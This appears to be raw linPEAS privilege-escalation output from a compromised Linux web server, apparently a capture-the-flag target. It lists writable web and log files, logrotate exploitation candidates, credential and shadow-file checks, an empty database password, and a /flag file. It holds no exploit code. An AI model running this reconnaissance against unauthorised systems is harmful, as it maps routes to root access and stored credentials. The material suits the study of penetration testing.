drwxr-xr-x   2 root root 4096 Jan 20  2025 .
drwxr-xr-x 104 root root 4096 Jun 14 20:01 ..
-rw-r--r--   1 root root   96 Dec  5  2019 01-locale-fix.sh
-rw-r--r--   1 root root 1557 Feb 17  2020 Z97-byobu.sh
-rwxr-xr-x   1 root root 3417 Dec  8  2022 Z99-cloud-locale-test.sh
-rwxr-xr-x   1 root root  873 Dec  8  2022 Z99-cloudinit-warnings.sh
-rw-r--r--   1 root root  835 Dec  1  2022 apps-bin-path.sh
-rw-r--r--   1 root root  729 Feb  2  2020 bash_completion.sh
-rw-r--r--   1 root root 1003 Aug 13  2019 cedilla-portuguese.sh
-rw-r--r--   1 root root 1107 Nov  3  2019 gawk.csh
-rw-r--r--   1 root root  757 Nov  3  2019 gawk.sh

╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d

╔══════════╣ AppArmor binary profiles
-rw-r--r-- 1 root root  3500 Jan 31  2023 sbin.dhclient
-rw-r--r-- 1 root root  3202 Feb 25  2020 usr.bin.man
-rw-r--r-- 1 root root 29450 Jul 26  2024 usr.lib.snapd.snap-confine.real
-rw-r--r-- 1 root root  2006 Oct 23  2024 usr.sbin.mysqld
-rw-r--r-- 1 root root  1575 Feb 11  2020 usr.sbin.rsyslogd
-rw-r--r-- 1 root root  1482 Feb 10  2023 usr.sbin.tcpdump

═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ No
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No

╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/root/
/root/.gdbinit
/root/.mysql_history
/root/.gitattributes
/root/.editorconfig
/root/.travis.yml
/root/php
/root/php/.gdbinit
/root/php/.gitattributes
/root/php/php-7.4.33.tar.gz
/root/php/.editorconfig
/root/php/.travis.yml
/root/php/php-7.4.33
/root/php/php-7.4.33/.gdbinit
/root/php/php-7.4.33/config.status
/root/php/php-7.4.33/CODING_STANDARDS.md
/root/php/php-7.4.33/pear
/root/php/php-7.4.33/pear/install-pear.txt
/root/php/php-7.4.33/pear/Makefile.frag
/root/php/php-7.4.33/pear/fetch.php
/root/php/php-7.4.33/pear/install-pear-nozlib.phar
/root/php/php-7.4.33/run-tests.php
/root/php/php-7.4.33/libtool
/root/php/php-7.4.33/Makefile
/root/php/php-7.4.33/.gitattributes
/root/php/php-7.4.33/LICENSE
/root/php/php-7.4.33/azure
/root/php/php-7.4.33/azure/macos
/root/php/php-7.4.33/azure/macos/test.yml

╔══════════╣ Searching folders owned by me containing others files on it (limit 100)

╔══════════╣ Readable files belonging to root and readable by me but not world readable

╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 200)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/opt
/opt/conf
/opt/conf/openrasp.yml
/opt/locale/es_ES
/opt/locale/es_ES/LC_MESSAGES
/opt/locale/es_ES/LC_MESSAGES/openrasp.mo
/opt/locale/fr_FR
/opt/locale/fr_FR/LC_MESSAGES
/opt/locale/fr_FR/LC_MESSAGES/openrasp.mo
/opt/locale/zh_CN.utf8
/opt/locale/zh_CN.utf8/LC_MESSAGES
/opt/locale/zh_CN.utf8/LC_MESSAGES/openrasp.mo
/opt/locale/zh_TW
/opt/locale/zh_TW/LC_MESSAGES
/opt/locale/zh_TW/LC_MESSAGES/openrasp.mo
/opt/logs
/opt/logs/alarm
/opt/logs/alarm/alarm.log.2025-01-20
/opt/logs/alarm/alarm.log.2025-01-21
/opt/logs/crash
/opt/logs/plugin
/opt/logs/plugin/plugin.log.2025-01-20
/opt/logs/plugin/plugin.log.2025-01-21
/opt/logs/plugin/plugin.log.2026-03-18
/opt/logs/plugin/plugin.log.2026-06-14
/opt/logs/policy
/opt/logs/policy/policy.log.2025-01-20
/opt/logs/policy/policy.log.2025-01-21
/opt/logs/policy/policy.log.2026-03-18
/opt/logs/policy/policy.log.2026-06-14
/opt/logs/rasp
/opt/plugins
/opt/plugins/official.js
/run/lock
/run/lock/apache2
/run/screen
/snap/core20/1828/run/lock
/snap/core20/1828/tmp
/snap/core20/1828/var/tmp
/snap/core20/2434/run/lock
/snap/core20/2434/tmp
/snap/core20/2434/var/tmp
/tmp
/tmp/linpeas.sh
/tmp/tmux-33
/var/cache/apache2/mod_cache_disk
/var/crash
/var/tmp
/var/www/html
/var/www/html/CHANGELOG.md
/var/www/html/LICENSE.txt
/var/www/html/README.md
/var/www/html/application
/var/www/html/application/.htaccess
/var/www/html/application/command.php
/var/www/html/application/common.php
/var/www/html/application/config.php
/var/www/html/application/database.php
#)You_can_write_even_more_files_inside_last_directory

/var/www/html/application/index/controller
/var/www/html/application/index/controller/Index.php
/var/www/html/application/route.php
/var/www/html/application/tags.php
/var/www/html/build.php
/var/www/html/composer.json
/var/www/html/composer.lock
/var/www/html/composer.phar
/var/www/html/extend
/var/www/html/extend/.gitignore
/var/www/html/html
/var/www/html/public
/var/www/html/public/.htaccess
/var/www/html/public/cmd.php
/var/www/html/public/favicon.ico
/var/www/html/public/index.php
/var/www/html/public/robots.txt
#)You_can_write_even_more_files_inside_last_directory

/var/www/html/public/static/.gitignore
/var/www/html/runtime
/var/www/html/runtime/.gitignore
/var/www/html/runtime/log
/var/www/html/runtime/log/202501
/var/www/html/runtime/log/202501/21.log
/var/www/html/runtime/log/202603
/var/www/html/runtime/log/202603/18.log
/var/www/html/think
/var/www/html/thinkphp
/var/www/html/thinkphp/.gitignore
/var/www/html/thinkphp/.htaccess
/var/www/html/thinkphp/.travis.yml
/var/www/html/thinkphp/CONTRIBUTING.md
/var/www/html/thinkphp/LICENSE.txt
#)You_can_write_even_more_files_inside_last_directory

/var/www/html/thinkphp/lang/zh-cn.php
/var/www/html/thinkphp/library
/var/www/html/thinkphp/library/think
/var/www/html/thinkphp/library/think/App.php
/var/www/html/thinkphp/library/think/Build.php
/var/www/html/thinkphp/library/think/Cache.php
/var/www/html/thinkphp/library/think/Collection.php
/var/www/html/thinkphp/library/think/Config.php
#)You_can_write_even_more_files_inside_last_directory

/var/www/html/thinkphp/library/think/cache/Driver.php
/var/www/html/thinkphp/library/think/cache/driver
/var/www/html/thinkphp/library/think/cache/driver/File.php
/var/www/html/thinkphp/library/think/cache/driver/Lite.php
/var/www/html/thinkphp/library/think/cache/driver/Memcache.php
/var/www/html/thinkphp/library/think/cache/driver/Memcached.php
/var/www/html/thinkphp/library/think/cache/driver/Redis.php
#)You_can_write_even_more_files_inside_last_directory

/var/www/html/thinkphp/library/think/config
/var/www/html/thinkphp/library/think/config/driver
/var/www/html/thinkphp/library/think/config/driver/Ini.php
/var/www/html/thinkphp/library/think/config/driver/Json.php
/var/www/html/thinkphp/library/think/config/driver/Xml.php
/var/www/html/thinkphp/library/think/console
/var/www/html/thinkphp/library/think/console/Command.php
/var/www/html/thinkphp/library/think/console/Input.php
/var/www/html/thinkphp/library/think/console/LICENSE
/var/www/html/thinkphp/library/think/console/Output.php
/var/www/html/thinkphp/library/think/console/bin
/var/www/html/thinkphp/library/think/console/bin/README.md
/var/www/html/thinkphp/library/think/console/bin/hiddeninput.exe
/var/www/html/thinkphp/library/think/console/command
/var/www/html/thinkphp/library/think/console/command/Build.php
/var/www/html/thinkphp/library/think/console/command/Clear.php
/var/www/html/thinkphp/library/think/console/command/Help.php
/var/www/html/thinkphp/library/think/console/command/Lists.php
/var/www/html/thinkphp/library/think/console/command/Make.php
#)You_can_write_even_more_files_inside_last_directory

/var/www/html/thinkphp/library/think/console/command/make/Controller.php
/var/www/html/thinkphp/library/think/console/command/make/Model.php
/var/www/html/thinkphp/library/think/console/command/make/stubs
/var/www/html/thinkphp/library/think/console/command/make/stubs/controller.plain.stub
/var/www/html/thinkphp/library/think/console/command/make/stubs/controller.stub
/var/www/html/thinkphp/library/think/console/command/make/stubs/model.stub
/var/www/html/thinkphp/library/think/console/command/optimize
/var/www/html/thinkphp/library/think/console/command/optimize/Autoload.php
/var/www/html/thinkphp/library/think/console/command/optimize/Config.php
/var/www/html/thinkphp/library/think/console/command/optimize/Route.php
/var/www/html/thinkphp/library/think/console/command/optimize/Schema.php
/var/www/html/thinkphp/library/think/console/input
/var/www/html/thinkphp/library/think/console/input/Argument.php
/var/www/html/thinkphp/library/think/console/input/Definition.php
/var/www/html/thinkphp/library/think/console/input/Option.php
/var/www/html/thinkphp/library/think/console/output
/var/www/html/thinkphp/library/think/console/output/Ask.php
/var/www/html/thinkphp/library/think/console/output/Descriptor.php
/var/www/html/thinkphp/library/think/console/output/Formatter.php
/var/www/html/thinkphp/library/think/console/output/Question.php
/var/www/html/thinkphp/library/think/console/output/descriptor
/var/www/html/thinkphp/library/think/console/output/descriptor/Console.php
/var/www/html/thinkphp/library/think/console/output/driver
/var/www/html/thinkphp/library/think/console/output/driver/Buffer.php
/var/www/html/thinkphp/library/think/console/output/driver/Console.php
/var/www/html/thinkphp/library/think/console/output/driver/Nothing.php
/var/www/html/thinkphp/library/think/console/output/formatter
/var/www/html/thinkphp/library/think/console/output/formatter/Stack.php
/var/www/html/thinkphp/library/think/console/output/formatter/Style.php
/var/www/html/thinkphp/library/think/console/output/question
/var/www/html/thinkphp/library/think/console/output/question/Choice.php
/var/www/html/thinkphp/library/think/console/output/question/Confirmation.php
/var/www/html/thinkphp/library/think/controller
/var/www/html/thinkphp/library/think/controller/Rest.php
/var/www/html/thinkphp/library/think/controller/Yar.php
/var/www/html/thinkphp/library/think/db
/var/www/html/thinkphp/library/think/db/Builder.php
/var/www/html/thinkphp/library/think/db/Connection.php
/var/www/html/thinkphp/library/think/db/Expression.php
/var/www/html/thinkphp/library/think/db/Query.php
/var/www/html/thinkphp/library/think/db/builder
/var/www/html/thinkphp/library/think/db/builder/Mysql.php
/var/www/html/thinkphp/library/think/db/builder/Pgsql.php
/var/www/html/thinkphp/library/think/db/builder/Sqlite.php
/var/www/html/thinkphp/library/think/db/builder/Sqlsrv.php
/var/www/html/thinkphp/library/think/db/connector
/var/www/html/thinkphp/library/think/db/connector/Mysql.php
/var/www/html/thinkphp/library/think/db/connector/Pgsql.php
/var/www/html/thinkphp/library/think/db/connector/Sqlite.php
/var/www/html/thinkphp/library/think/db/connector/Sqlsrv.php
/var/www/html/thinkphp/library/think/db/connector/pgsql.sql
/var/www/html/thinkphp/library/think/db/exception
/var/www/html/thinkphp/library/think/db/exception/BindParamException.php
/var/www/html/thinkphp/library/think/db/exception/DataNotFoundException.php
/var/www/html/thinkphp/library/think/db/exception/ModelNotFoundException.php
/var/www/html/thinkphp/library/think/debug
/var/www/html/thinkphp/library/think/debug/Console.php
/var/www/html/thinkphp/library/think/debug/Html.php
/var/www/html/thinkphp/library/think/exception
/var/www/html/thinkphp/library/think/exception/ClassNotFoundException.php
/var/www/html/thinkphp/library/think/exception/DbException.php
/var/www/html/thinkphp/library/think/exception/ErrorException.php

╔══════════╣ Interesting GROUP writable files (not in Home) (max 200)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
  Group www-data:
/opt/logs/alarm/alarm.log.2025-01-20
/opt/logs/alarm/alarm.log.2025-01-21
/var/www/html/build.php
/var/www/html/extend
/var/www/html/extend/.gitignore
/var/www/html/application
/var/www/html/application/config.php
/var/www/html/application/tags.php
/var/www/html/application/common.php
/var/www/html/application/command.php
/var/www/html/application/.htaccess
#)You_can_write_even_more_files_inside_last_directory

/var/www/html/application/index/controller
/var/www/html/application/index/controller/Index.php
/var/www/html/runtime
/var/www/html/runtime/.gitignore
/var/www/html/vendor
/var/www/html/vendor/.gitignore
/var/www/html/LICENSE.txt
/var/www/html/think
/var/www/html/CHANGELOG.md
/var/www/html/public
/var/www/html/public/robots.txt
/var/www/html/public/static
/var/www/html/public/static/.gitignore
/var/www/html/public/router.php
/var/www/html/public/index.php
/var/www/html/public/.htaccess
/var/www/html/public/favicon.ico
/var/www/html/README.md



                            ╔═════════════════════════╗
════════════════════════════╣ Other Interesting Files ╠════════════════════════════
                            ╚═════════════════════════╝
╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path
/usr/bin/rescan-scsi-bus.sh
/usr/bin/gettext.sh

╔══════════╣ Executable files potentially added by user (limit 70)
2026-06-14+20:32:21.1159603590 /usr/local/share/aliyun-assist/cache/state_configs.json
2026-06-14+20:30:23.2039627740 /usr/local/share/aliyun-assist/2.2.4.1065/acs-plugin-manager
2026-06-14+20:30:23.0199627780 /usr/local/share/aliyun-assist/2.2.4.1065/aliyun_assist_update
2026-06-14+20:30:22.8399627810 /usr/local/share/aliyun-assist/2.2.4.1065/aliyun_installer
2026-06-14+20:30:22.4999627880 /usr/local/share/aliyun-assist/2.2.4.1065/aliyun-service
2026-06-14+20:30:21.8479628020 /usr/local/share/aliyun-assist/2.2.4.1065/plugin/ACS-ECS-SysInfoGatherer/2.0.3.223/sysinfo-gatherer
2026-06-14+20:30:21.5039628090 /usr/local/share/aliyun-assist/2.2.4.1065/update_install
2025-01-20+08:38:55.9390024580 /usr/local/bin/phar.phar
2025-01-20+08:38:55.4989967660 /usr/local/bin/php-config
2025-01-20+08:38:55.3949954210 /usr/local/bin/phpize
2025-01-20+08:38:26.4506213570 /usr/local/lib/php/build/config.sub
2025-01-20+08:38:26.4386212030 /usr/local/lib/php/build/config.guess
2025-01-20+08:38:26.4226209960 /usr/local/lib/php/build/shtool
2025-01-20+08:38:26.1866179490 /usr/local/bin/php-cgi
2025-01-20+08:38:25.6626111840 /usr/local/bin/phpdbg
2025-01-20+08:38:24.9426018870 /usr/local/bin/php
2025-01-20+08:38:24.5305965670 /usr/local/lib/php/extensions/no-debug-non-zts-20190902/opcache.so
2025-01-20+08:38:23.4665828330 /root/php/php-7.4.33/sapi/phpdbg/phpdbg
2025-01-20+08:38:23.1905792690 /root/php/php-7.4.33/ext/phar/phar.phar
2025-01-20+08:38:22.7585736930 /root/php/php-7.4.33/sapi/cli/php
2025-01-20+08:38:22.6025716800 /root/php/php-7.4.33/sapi/cgi/php-cgi
2025-01-20+08:38:20.5145447320 /root/php/php-7.4.33/libs/libphp7.so
2025-01-20+08:38:19.5625324460 /root/php/php-7.4.33/.libs/libphp7.so
2025-01-20+08:37:14.6816971880 /root/php/php-7.4.33/modules/opcache.so
2025-01-20+08:37:14.4856946720 /root/php/php-7.4.33/ext/opcache/.libs/opcache.so
2025-01-20+08:17:30.6643348700 /root/php/php-7.4.33/config.status
2025-01-20+08:17:29.2403234670 /root/php/php-7.4.33/libtool
2025-01-20+08:16:12.9317451370 /root/php/php-7.4.33/config.nice
2025-01-20+08:05:00.6992859100 /usr/local/lib/php/extensions/no-debug-non-zts-20190902/pdo_mysql.so
2025-01-20+06:00:43.5714706630 /usr/local/lib/php/extensions/no-debug-non-zts-20190902/mysqli.so
2025-01-20+03:14:24.2591888770 /etc/console-setup/cached_setup_terminal.sh
2025-01-20+03:14:24.2511888770 /etc/console-setup/cached_setup_font.sh
2025-01-20+03:14:24.2471888770 /etc/console-setup/cached_setup_keyboard.sh
2025-01-20+02:56:01.9629364890 /usr/sbin/policy-rc.d

╔══════════╣ Unexpected in /opt (usually empty)
total 28
drwxrwxrwx  7 root root 4096 Jan 20  2025 .
drwxr-xr-x 20 root root 4096 Mar 18 05:35 ..
drwxr-xr-x  2 root root 4096 Jan 20  2025 assets
drwxrwxrwx  2 root root 4096 Jan 20  2025 conf
drwxr-xr-x  6 root root 4096 Jan 20  2025 locale
drwxrwxrwx  7 root root 4096 Jan 20  2025 logs
drwxrwxrwx  2 root root 4096 Jan 20  2025 plugins

╔══════════╣ Unexpected in root
/flag
/swap.img

╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/usr/local/cloudmonitor/local_data/logs/argusagent.log
/usr/local/cloudmonitor/local_data/logs/argus-last-send-cms.txt
/usr/local/share/aliyun-assist/2.2.4.1065/log/aliyun_assist_main.log.20260614
/var/log/auth.log
/var/log/journal/39760a7463374eb2bb1ad89f26f4a02f/system.journal
/var/log/syslog
/var/log/kern.log
/var/log/apache2/access.log
/var/log/mysql/error.log

╔══════════╣ Writable log files (logrotten) (limit 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#logrotate-exploitation
logrotate 3.14.0

    Default mail command:       /usr/bin/mail
    Default compress command:   /bin/gzip
    Default uncompress command: /bin/gunzip
    Default compress extension: .gz
    Default state file path:    /var/lib/logrotate/status
    ACL support:                yes
    SELinux support:            yes
Writable: /opt/logs/plugin/plugin.log.2026-03-18
Writable: /opt/logs/plugin/plugin.log.2025-01-21
Writable: /opt/logs/plugin/plugin.log.2026-06-14
Writable: /opt/logs/alarm/alarm.log.2025-01-20
Writable: /opt/logs/alarm/alarm.log.2025-01-21
Writable: /opt/logs/policy/policy.log.2025-01-20
Writable: /opt/logs/policy/policy.log.2025-01-21
Writable: /opt/logs/policy/policy.log.2026-06-14
Writable: /var/www/html/runtime/log/202501/21.log
Writable: /var/www/html/runtime/log/202603/18.log

╔══════════╣ Files inside /home/www-data (limit 20)

╔══════════╣ Files inside others home (limit 20)
/home/ubuntu/.bash_logout
/home/ubuntu/.bashrc
/home/ubuntu/.profile
/home/ubuntu/.ssh/authorized_keys
/home/ubuntu/.sudo_as_admin_successful
/home/ubuntu/.cache/motd.legal-displayed
/root/.gdbinit
/root/.mysql_history
/root/.gitattributes
/root/.editorconfig
/root/.travis.yml
/root/php/.gdbinit
/root/php/.gitattributes
/root/php/php-7.4.33.tar.gz
/root/php/.editorconfig
/root/php/.travis.yml
/root/php/php-7.4.33/.gdbinit
/root/php/php-7.4.33/config.status
/root/php/php-7.4.33/CODING_STANDARDS.md
/root/php/php-7.4.33/pear/install-pear.txt
grep: write error: Broken pipe

╔══════════╣ Searching installed mail applications

╔══════════╣ Mails (limit 50)

╔══════════╣ Backup folders
drwxr-xr-x 2 root root 3 Apr 15  2020 /snap/core20/1828/var/backups
total 0

drwxr-xr-x 2 root root 3 Apr 15  2020 /snap/core20/2434/var/backups
total 0

drwxr-xr-x 2 root root 4096 Jan 21  2025 /var/backups
total 1020
-rw-r--r-- 1 root root  51200 Jan 21  2025 alternatives.tar.0
-rw-r--r-- 1 root root   2731 Jan 20  2025 alternatives.tar.1.gz
-rw-r--r-- 1 root root  42578 Jan 20  2025 apt.extended_states.0
-rw-r--r-- 1 root root    268 Jan 20  2025 dpkg.diversions.0
-rw-r--r-- 1 root root    139 Jan 20  2025 dpkg.diversions.1.gz
-rw-r--r-- 1 root root    135 Jan 20  2025 dpkg.statoverride.0
-rw-r--r-- 1 root root    142 Jan 20  2025 dpkg.statoverride.1.gz
-rw-r--r-- 1 root root 736001 Jan 21  2025 dpkg.status.0
-rw-r--r-- 1 root root 184605 Jan 20  2025 dpkg.status.1.gz


╔══════════╣ Backup files (limited 100)
-rw-r--r-- 1 root root 2743 Mar 14  2023 /etc/apt/sources.list.curtin.old
-rw-r--r-- 1 root root 237789 Dec  5  2024 /usr/src/linux-headers-5.4.0-204-generic/.config.old
-rw-r--r-- 1 root root 0 Dec  5  2024 /usr/src/linux-headers-5.4.0-204-generic/include/config/wm831x/backup.h
-rw-r--r-- 1 root root 0 Dec  5  2024 /usr/src/linux-headers-5.4.0-204-generic/include/config/net/team/mode/activebackup.h
-rwxr-xr-x 1 root root 1086 Nov 25  2019 /usr/src/linux-headers-5.4.0-204/tools/testing/selftests/net/tcp_fastopen_backup_key.sh
-rw-r--r-- 1 root root 392817 Feb  9  2020 /usr/share/doc/manpages/Changes.old.gz
-rw-r--r-- 1 root root 7867 Jul 16  1996 /usr/share/doc/telnet/README.old.gz
-rwxr-xr-x 1 root root 226 Feb 17  2020 /usr/share/byobu/desktop/byobu.desktop.old
-rw-r--r-- 1 root root 2756 Feb 13  2020 /usr/share/man/man8/vgcfgbackup.8.gz
-rw-r--r-- 1 root root 11886 Jan 20  2025 /usr/share/info/dir.old
-rw-r--r-- 1 root root 473 Jan 20  2025 /usr/local/lib/php.ini.bak
-rw-r--r-- 1 root root 65140728 Jan 20  2025 /usr/local/lib/php/extensions/no-debug-non-zts-20190902/openrasp.so.bak
-rw-r--r-- 1 root root 44048 Oct 27  2023 /usr/lib/x86_64-linux-gnu/open-vm-tools/plugins/vmsvc/libvmbackup.so
-rw-r--r-- 1 root root 39448 Oct 23  2024 /usr/lib/mysql/plugin/component_mysqlbackup.so
-rw-r--r-- 1 root root 9833 Dec  5  2024 /usr/lib/modules/5.4.0-204-generic/kernel/drivers/power/supply/wm831x_backup.ko
-rw-r--r-- 1 root root 9073 Dec  5  2024 /usr/lib/modules/5.4.0-204-generic/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 1802 Aug 15  2022 /usr/lib/python3/dist-packages/sos/report/plugins/ovirt_engine_backup.py
-rw-r--r-- 1 root root 1413 Mar 14  2023 /usr/lib/python3/dist-packages/sos/report/plugins/__pycache__/ovirt_engine_backup.cpython-38.pyc

╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found /var/lib/PackageKit/transactions.db: SQLite 3.x database, last written using SQLite version 3031001
Found /var/lib/command-not-found/commands.db: SQLite 3.x database, last written using SQLite version 3031001
Found /var/lib/fwupd/pending.db: SQLite 3.x database, last written using SQLite version 3031001

 -> Extracting tables from /var/lib/PackageKit/transactions.db (limit 20)
 -> Extracting tables from /var/lib/command-not-found/commands.db (limit 20)
 -> Extracting tables from /var/lib/fwupd/pending.db (limit 20)

╔══════════╣ Web files?(output limit)
/var/www/:
total 12K
drwxr-xr-x  3 root     root     4.0K Jan 20  2025 .
drwxr-xr-x 14 root     root     4.0K Jan 20  2025 ..
drwxr-xr-x  9 www-data www-data 4.0K Jan 21  2025 html

/var/www/html:
total 2.0M
drwxr-xr-x 9 www-data www-data 4.0K Jan 21  2025 .
drwxr-xr-x 3 root     root     4.0K Jan 20  2025 ..

╔══════════╣ All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw------- 1 root root 0 Jun 14 20:00 /run/snapd/lock/.lock
-rw-r--r-- 1 root root 20 Jun 14 20:00 /run/cloud-init/.instance-id
-rw-r--r-- 1 root root 2 Jun 14 20:30 /run/cloud-init/.ds-identify.result
-rw-r--r-- 1 ubuntu ubuntu 220 Feb 25  2020 /home/ubuntu/.bash_logout
-rw------- 1 root root 0 Mar 14  2023 /etc/.pwd.lock
-rw-r--r-- 1 root root 220 Feb 25  2020 /etc/skel/.bash_logout
-rw-r--r-- 1 root root 733 Oct 31  2022 /root/.editorconfig
-rw-r--r-- 1 root root 733 Oct 31  2022 /root/php/.editorconfig
-rw-rw-r-- 1 root root 23 Oct 31  2022 /root/php/php-7.4.33/ext/phar/tests/bug64931/src/.pharignore
-rw-rw-r-- 1 root root 733 Oct 31  2022 /root/php/php-7.4.33/.editorconfig
-rw-rw-r-- 1 root root 1560 Oct 31  2022 /root/php/php-7.4.33/.appveyor.yml
-rw-r--r-- 1 root root 1560 Oct 31  2022 /root/php/.appveyor.yml
-rw-r--r-- 1 root root 1560 Oct 31  2022 /root/.appveyor.yml
-rw------- 1 root root 0 Feb  7  2023 /snap/core20/1828/etc/.pwd.lock
-rw-r--r-- 1 root root 220 Feb 25  2020 /snap/core20/1828/etc/skel/.bash_logout
-rw------- 1 root root 0 Sep 11  2024 /snap/core20/2434/etc/.pwd.lock
-rw-r--r-- 1 root root 220 Feb 25  2020 /snap/core20/2434/etc/skel/.bash_logout
-rw-r--r-- 1 root root 1913 Jan 20  2025 /var/cache/apparmor/e10c1cf9.0/.features
-rw-r--r-- 1 root root 1913 Mar 14  2023 /var/cache/apparmor/1d1e8206.0/.features
-rw-r--r-- 1 root root 1913 Jan 20  2025 /var/cache/apparmor/26b63962.0/.features
-rw------- 1 daemon daemon 2 Mar 14  2023 /var/spool/cron/atjobs/.SEQ
-rw-rw-r-- 1 www-data www-data 13 Dec 10  2018 /var/www/html/application/.htaccess
-rw-r--r-- 1 www-data www-data 13 Dec  9  2018 /var/www/html/thinkphp/.htaccess
-rw-r--r-- 1 landscape landscape 0 Mar 14  2023 /var/lib/landscape/.cleanup.user

╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rwxr-xr-x 1 www-data www-data 827071 Jan  1  2025 /tmp/linpeas.sh
-rw-r--r-- 1 root root 51200 Jan 21  2025 /var/backups/alternatives.tar.0
-rw-r--r-- 1 root root 2731 Jan 20  2025 /var/backups/alternatives.tar.1.gz

╔══════════╣ Searching passwords in history files

╔══════════╣ Searching passwords in config PHP files
/var/www/html/application/database.php:    'password'        => '',

╔══════════╣ Searching *password* or *credential* files in home (limit 70)
/etc/pam.d/common-password
/etc/ssl/private/ssl-cert-snakeoil.key
/root/php/php-7.4.33/ext/mysqli/tests/mysqli_expire_password.phpt
/root/php/php-7.4.33/ext/oci8/tests/password.phpt
/root/php/php-7.4.33/ext/oci8/tests/password_2.phpt
/root/php/php-7.4.33/ext/oci8/tests/password_new.phpt
/root/php/php-7.4.33/ext/oci8/tests/password_old.phpt
  #)There are more creds/passwds files in the previous parent folder

/root/php/php-7.4.33/ext/openssl/tests/private_rsa_1024.key
/root/php/php-7.4.33/ext/openssl/tests/private_rsa_2048.key
/root/php/php-7.4.33/ext/openssl/tests/private_rsa_2048_pass_php.key
  #)There are more creds/passwds files in the previous parent folder

/root/php/php-7.4.33/ext/sockets/tests/socket_cmsg_credentials.phpt
/root/php/php-7.4.33/ext/sodium/tests/php_password_hash_argon2i.phpt
/root/php/php-7.4.33/ext/sodium/tests/php_password_hash_argon2id.phpt
/root/php/php-7.4.33/ext/sodium/tests/php_password_verify.phpt
/root/php/php-7.4.33/ext/standard/.libs/password.o
/root/php/php-7.4.33/ext/standard/password.c
/root/php/php-7.4.33/ext/standard/password.lo
/root/php/php-7.4.33/ext/standard/php_password.h
/root/php/php-7.4.33/ext/standard/tests/password
/root/php/php-7.4.33/ext/standard/tests/password/password_bcrypt_errors.phpt
/root/php/php-7.4.33/ext/standard/tests/password/password_default.phpt
/root/php/php-7.4.33/ext/standard/tests/password/password_deprecated_salts.phpt
/root/php/php-7.4.33/ext/standard/tests/password/password_get_info.phpt
  #)There are more creds/passwds files in the previous parent folder


╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs

╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs

╔══════════╣ Searching passwords inside logs (limit 70)
 base-passwd depends on libc6 (>= 2.8); however:
 base-passwd depends on libdebconfclient0 (>= 0.145); however:
2023-03-14 22:41:45 configure base-passwd:amd64 3.5.47 3.5.47
2023-03-14 22:41:45 install base-passwd:amd64 <none> 3.5.47
2023-03-14 22:41:45 status half-configured base-passwd:amd64 3.5.47
2023-03-14 22:41:45 status half-installed base-passwd:amd64 3.5.47
2023-03-14 22:41:45 status installed base-passwd:amd64 3.5.47
2023-03-14 22:41:45 status unpacked base-passwd:amd64 3.5.47
2023-03-14 22:41:47 status half-configured base-passwd:amd64 3.5.47
2023-03-14 22:41:47 status half-installed base-passwd:amd64 3.5.47
2023-03-14 22:41:47 status unpacked base-passwd:amd64 3.5.47
2023-03-14 22:41:47 upgrade base-passwd:amd64 3.5.47 3.5.47
2023-03-14 22:41:50 install passwd:amd64 <none> 1:4.8.1-1ubuntu5
2023-03-14 22:41:50 status half-installed passwd:amd64 1:4.8.1-1ubuntu5
2023-03-14 22:41:50 status unpacked passwd:amd64 1:4.8.1-1ubuntu5
2023-03-14 22:41:51 configure base-passwd:amd64 3.5.47 <none>
2023-03-14 22:41:51 status half-configured base-passwd:amd64 3.5.47
2023-03-14 22:41:51 status installed base-passwd:amd64 3.5.47
2023-03-14 22:41:51 status unpacked base-passwd:amd64 3.5.47
2023-03-14 22:41:52 configure passwd:amd64 1:4.8.1-1ubuntu5 <none>
2023-03-14 22:41:52 status half-configured passwd:amd64 1:4.8.1-1ubuntu5
2023-03-14 22:41:52 status installed passwd:amd64 1:4.8.1-1ubuntu5
2023-03-14 22:41:52 status unpacked passwd:amd64 1:4.8.1-1ubuntu5
2023-03-14 22:42:31 configure passwd:amd64 1:4.8.1-1ubuntu5.20.04.4 <none>
2023-03-14 22:42:31 status half-configured passwd:amd64 1:4.8.1-1ubuntu5
2023-03-14 22:42:31 status half-configured passwd:amd64 1:4.8.1-1ubuntu5.20.04.4
2023-03-14 22:42:31 status half-installed passwd:amd64 1:4.8.1-1ubuntu5
2023-03-14 22:42:31 status installed passwd:amd64 1:4.8.1-1ubuntu5.20.04.4
2023-03-14 22:42:31 status unpacked passwd:amd64 1:4.8.1-1ubuntu5
2023-03-14 22:42:31 status unpacked passwd:amd64 1:4.8.1-1ubuntu5.20.04.4
2023-03-14 22:42:31 upgrade passwd:amd64 1:4.8.1-1ubuntu5 1:4.8.1-1ubuntu5.20.04.4
2025-01-20 03:15:09,394 - util.py[DEBUG]: Writing to /var/lib/cloud/instances/iid-datasource-none/sem/config_set_passwords - wb: [644] 25 bytes
2025-01-20 03:15:09,424 - ssh_util.py[DEBUG]: line 1: option PasswordAuthentication added with yes
2025-01-20 03:15:09,542 - cc_set_passwords.py[DEBUG]: Restarted the SSH daemon.
Binary file /var/log/dpkg.log.1 matches
Binary file /var/log/journal/39760a7463374eb2bb1ad89f26f4a02f/system.journal matches
Binary file /var/log/journal/39760a7463374eb2bb1ad89f26f4a02f/system@00064d4c85b67cce-c94784754d2497fe.journal~ matches
